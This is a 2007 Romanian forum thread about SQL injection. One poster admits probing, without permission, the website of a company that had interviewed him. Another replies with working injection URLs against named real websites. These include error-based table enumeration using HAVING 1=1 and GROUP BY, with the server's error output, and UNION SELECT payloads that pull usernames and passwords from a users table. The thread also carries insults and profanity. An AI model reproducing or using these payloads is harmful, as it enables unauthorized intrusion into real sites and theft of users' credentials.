michee Posted November 8, 2007 Report Posted November 8, 2007 postez aici ca n-am vazut topic special de mysql injection.....este XSS dar nu si asta...Deci...am gasit un SQL injection intr-un site.....faza e ca am ceva de genul ....WHERE id=123142 eu inserez un "ORDER BY 20 --"si rezulta ceva WHERE id=123142 ORDER BY 20 -- GROUP BY alt_idFaza e ca-mi da o eroare la GROUP BY ....De ce nu merge comentariul -- ??Stiti alta metoda sa comentez ce urmeaza? adik GROUP BY -ul? Eu n-am gasit....... Quote
kw3rln Posted November 8, 2007 Report Posted November 8, 2007 da-ne si noua linkul! ai pus la sf "/*" ? Quote
michee Posted November 8, 2007 Author Report Posted November 8, 2007 linkul chiar nu pot sa vi-l dau ptr ca dau interviu la ei.....am pus -- Nu e comentariu?se pare ca ai dreptate, mege cu /*......da de ce asa si nu asa?ps: asta nu face parte din interviu! Quote
escalation666 Posted November 8, 2007 Report Posted November 8, 2007 look here kid...un exemplu live pentru tinehttp://www.cartel-alfa.ro/navigare.asp?id=77%20having%201=1testam rapid daca baza de date "scuipa" ceva columns, cu "having 1=1"Microsoft OLE DB Provider for SQL Server error '80040e14'Column 'tblNews.News_ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. Noua tabela aflata o folosim intr-o interogare de tipul "group by", dupa cum urmeaza:http://www.cartel-alfa.ro/navigare.asp?id=77%20%20group%20by%20tbl.News.News_ID%20having%201=1Microsoft OLE DB Provider for SQL Server error '80040e14'Column 'tblNews.News_title' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. a doua tabela aflata, iarasi o folosim intr-o interogare de tipul "group by":http://www.cartel-alfa.ro/navigare.asp?id=77%20%20group%20by%20tbl.News.News_ID,tblNews.News_title%20having%201=1Microsoft OLE DB Provider for SQL Server error '80040e14'Column 'tblNews.News_Date' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. ...pana se ajunge la ceva de genul:http://www.cartel-alfa.ro/navigare.asp?id=77%20%20group%20by%20tbl.News.News_ID,tblNews.News_title,tblNews.News_Date,tblNews.Short_news%20having%201=1Microsoft OLE DB Provider for SQL Server error '80040e14'The text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator. Si cam asa se concretizeaza o metoda de aflare a tabelelor, dupa aceea cu informatiile obtinute putandu-se realiza un update, sau alte magarii.Dar, dupa cum am invatat din experienta, cu sql injections ar cam trebui sa te porti cam cum ar trebui sa te porti cu femeile Adica...ajunge atata vorbarie cu group by...having 1=1-- blabla...u just have to stick it like this:pass:http://www.antibiotice.ro/news.php?id=-1/**/UNION/**/ALL/**/SELECT/**/0,1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/users/*luser:http://www.antibiotice.ro/news.php?id=-1/**/UNION/**/ALL/**/SELECT/**/0,1,2,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/users/*si cam atat pentru azi...si multe vreme de acu incolo Quote
michee Posted November 8, 2007 Author Report Posted November 8, 2007 mersi,da ii rezolvasem:)Oricum exemplul e binevenit, thanks. Quote
kw3rln Posted November 8, 2007 Report Posted November 8, 2007 se pare ca ai dreptate, mege cu /*......da de ce asa si nu asa?ma bucur ca te-am putut ajuta !interviu? wtf Quote
michee Posted November 9, 2007 Author Report Posted November 9, 2007 mda....interviu.......am fost pe la unii la interviu, m-am enervat un pic si am ajuns acasa......si-am inceput sa le iau site-ul la puricat:)Concluzia e ca era dezastru....si ei ma intrebau pe mine intr-un test daca "Nycole"(cred ca asta iesea dintr-o anagrama) e nume insula,fluviu, oras, ocean sau pm:))ps: sa revenim la sql injection. Acelasi lucru de mai sus cu HAVING 1=1 il obtineam cu un simplu ' . Acuma pe mysql server iau datele despre toate db-urile si toate tabelele din db-ul INFORMATION_SCHEMA. pe SQL Server-ul ala sau ce era, cum obtin aceste date? Quote
escalation666 Posted November 9, 2007 Report Posted November 9, 2007 heh...e vorba despre insula Ceylon...cat despre celelalte nu stiu ce sa zic...te rogi la all Mighty god? :roll: oricum, il vrei pe d-zeu cu intrebarile tale, mai ales ca nu dai nici o informatie Quote
michee Posted November 9, 2007 Author Report Posted November 9, 2007 1)ceylon.....whatever....Who the fuck cares, really? Ce eu m-am dus acolo sa dau test de cultura generala? Eram invitat cumva la "Vrei sa fii miliardar" si nu mi-am dat eu seama?2)sa ma rog la ce???? De ce???3)pai ce informatie sa dau? E serverul care ti l-am zis...si practic ma interesa un echivalent al bazei de date information_schema din mysql (daca exista)....a.i. sa aflu date despe alte db-uri, tabele si campuri de pe serverul respectiv. Quote
escalation666 Posted November 9, 2007 Report Posted November 9, 2007 Corect...ce iti trebuie tie cultura generala, fuckin' moronCiteste un tutorial de sql injection daca nu ai prea multa lene in tine, "pai ce informatie sa dau?" da, pai ce informatii din erori poti sa dai, ca doar noi avem imaginatie bogata si ne putem inchipui. Si oricum e bine ca te intereseaza INFORMATION_SCHEMA, cu toate ca nu functioneaza sa o folosesti intotdeauna in interogari. Quote
michee Posted November 10, 2007 Author Report Posted November 10, 2007 Vere...explica-mi si mie relevanta culturii generale ptr un asemenea post.....baietii aia de-acolo nu stiau sa faca un site ANTI-INJECTION si ANTI-XSS.........apropo ei erau vreo 6 eu eram unu singur si culmea ironiei lucrau de vreo 6 ani la portalul ala.Deci ce ti se mai important? Cine e mai avantajat? Stiau ei ca Ceylon e insula? Foarte bine, ma doare la pula.....i-am facut de tot rahatu practic.Sa-nvete tot atlasu geografic si ce mai vor ei tot niste terminati sunt.....Cand am zis ce informatie sa dau ====> Nu era nici o informatie de dat de aia nu am dat.si inca o data .......MA FUT IN EA DE CULTURA GENERALA daca nu esti in stare sa faci(BINE) lucrul ptr ca esti platit sa-l faci. Quote
moubik Posted November 10, 2007 Report Posted November 10, 2007 ca sa te aperi de xss si de sql trebuie sa filtrezi absolut toate xssurile si sqlurile din siteul tau.ca sa faci xss trebuie sa gasesti unul singur. Quote
michee Posted November 10, 2007 Author Report Posted November 10, 2007 da si n-am inteles exact ce vrei sa zici cu asta moubik.... Quote
tw8 Posted November 10, 2007 Report Posted November 10, 2007 da si n-am inteles exact ce vrei sa zici cu asta moubik....Vrea sa spuna ca e mult mai greu sa securizezi un site decat sa gasesti o vulnerabilitate in el.Bafta ! Quote
michee Posted November 10, 2007 Author Report Posted November 10, 2007 ....vere......deci ce-am gasit eu acolo erau chestii care puteau fi evitate foarte simplu cu 2 functii de filtrare una ptr XSS si una ptr SQL.....Eu in site-urile mele am o singura functie de fapt care le face pe amandoua....si o apelez peste tot unde am un GET sau un POST....Si cu functia asta in mod sigur 90% din atacuri zic eu.... Quote